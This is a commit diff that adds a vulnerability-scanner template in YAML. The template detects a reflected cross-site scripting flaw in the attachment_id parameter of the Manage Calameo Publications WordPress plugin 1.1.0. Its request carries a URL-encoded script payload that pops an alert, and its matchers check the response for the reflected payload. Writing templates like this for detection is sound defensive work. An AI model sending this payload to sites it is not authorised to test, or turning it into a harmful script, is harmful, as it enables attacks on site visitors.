Create wp-athlon-manage-calameo-publications-xss.yaml

vulnerabilities/wordpress/wp-athlon-manage-calameo-publications-xss.yaml

@@ -0,0 +1,37 @@
+id: wp-athlon-manage-calameo-publications-xss
+
+info:
+  name: Manage Calameo Publications 1.1.0 - thickbox_content.php attachment_id Parameter Reflected XSS
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    The Manage Calameo Publications by Athlon WordPress plugin was affected by a thickbox_content.php attachment_id Parameter Reflected XSS security vulnerability.
+  reference:
+    - https://codevigilant.com/disclosure/wp-plugin-athlon-manage-calameo-publications-a3-cross-site-scripting-xss/
+    - https://wpscan.com/vulnerability/83343eb3-bb4c-4b82-adf6-745882f872cc
+  metadata:
+    verified: true
+  tags: wordpress,wp-plugin,xss,unauth
+
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '(id\"><script>alert(document.domain)</script>&)'
+          - 'ath_upload_calameo_publication'
+        part: body
+
+      - type: word
+        words:
+          - 'text/html'
+        part: header
+
+      - type: status
+        status:
+          - 200